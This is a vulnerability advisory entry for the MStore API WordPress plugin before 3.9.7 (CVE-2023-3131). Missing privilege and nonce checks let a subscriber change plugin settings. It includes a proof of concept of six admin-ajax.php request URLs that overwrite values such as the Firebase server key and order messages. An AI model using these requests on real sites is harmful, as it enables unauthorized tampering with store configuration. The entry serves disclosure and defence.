Lucene search
Truoc PhanWPEX-ID:970735F1-24BB-441C-89B6-5A0959246D6CHistoryJun 19, 2023 - 12:00 a.m.
MStore API < 3.9.7 - Subscriber+ Unauthorized Settings Update
2023-06-1900:00:00
Truoc Phan
40
mstore api
unauthorized settings update
woocommerce
subscriber
target server
exploit
administrator
ajax.
0.001 Low
EPSS
Percentile
23.3%
The plugin does not secure most of its AJAX actions by implementing privilege checks, nonce checks, or a combination of both.
Make sure the site also has WooCommerce installed and activated, then, while logged-in as a subscriber, visit the following URLs:
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_limit_product&limit=99
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_firebase_server_key&serverKey=hacked
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_new_order_title&title=1337
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_new_order_message&message=hacked+message
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_status_order_title&title=1338
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_status_order_message&message=hacked+message
Then, while logged-in as an administrator, visit /wp-admin/admin.php?page=mstore-plugin, and notice how the attacks have changed all the values.Related
wpvulndb
wpvulndb
MStore API < 3.9.7 - Subscriber+ Unauthorized Settings Update
2023-06-19 00:00:00
prion
prion
Privilege escalation
2023-07-10 16:15:00
Privilege escalation
2023-07-10 16:15:00
cvelist
cvelist
CVE-2023-3131 MStore API < 3.9.7 - Subscriber+ Unauthorized Settings Update
2023-07-10 12:41:17
CVE-2023-3209 MStore API < 3.9.7 - Settings Update via CSRF
2023-07-10 12:41:04
nvd
nvd
CVE-2023-3131
2023-07-10 16:15:55
CVE-2023-3209
2023-07-10 16:15:55
cve
cve
CVE-2023-3131
2023-07-10 16:15:55
CVE-2023-3209
2023-07-10 16:15:55